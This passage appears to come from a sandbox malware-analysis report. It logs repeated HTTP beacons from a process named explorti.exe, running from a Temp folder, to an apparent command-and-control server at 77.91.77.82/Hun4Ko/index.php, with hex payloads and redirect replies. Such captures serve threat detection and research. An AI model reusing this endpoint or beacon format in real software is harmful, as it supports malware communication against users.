                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:34.820579052 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:35.039117098 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:34 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            50192.168.2.46394277.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:35.162817955 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:35.847228050 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:35 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:35.848095894 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:36.061840057 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:35 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            51192.168.2.46394377.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:36.178625107 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:36.868891001 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:36 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:36.869781017 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:37.084311962 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:36 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            52192.168.2.46394477.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:37.199198008 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:37.885560036 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:37 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:37.887917042 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:38.103653908 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:37 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            53192.168.2.46394577.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:38.228363037 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:38.931890965 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:38 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:38.932794094 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:39.158497095 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:39 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            54192.168.2.46394677.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:39.273329020 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:39.968667984 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:39 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:39.969954967 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:40.197369099 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:40 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            55192.168.2.46394777.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:40.319431067 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:41.019453049 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:40 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:41.021142006 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:41.242199898 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:41 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            56192.168.2.46394877.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:41.355894089 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:42.054740906 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:41 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:42.055612087 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:42.272001982 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:42 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            57192.168.2.46394977.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:42.381548882 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:43.105432034 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:42 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:43.113204002 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:43.339029074 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:43 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            58192.168.2.46395077.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:43.464873075 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            59192.168.2.46395177.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:43.493576050 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:44.181431055 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:44 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            60192.168.2.46395277.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:44.306242943 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:44.994637966 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:44 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            61192.168.2.46395377.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:45.004108906 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:45.722793102 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:45 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            62192.168.2.46395477.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:45.840579987 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:46.544487000 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:46 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            63192.168.2.46395577.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:46.556972980 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:47.254251957 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:47 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            64192.168.2.46395677.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:47.367784023 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
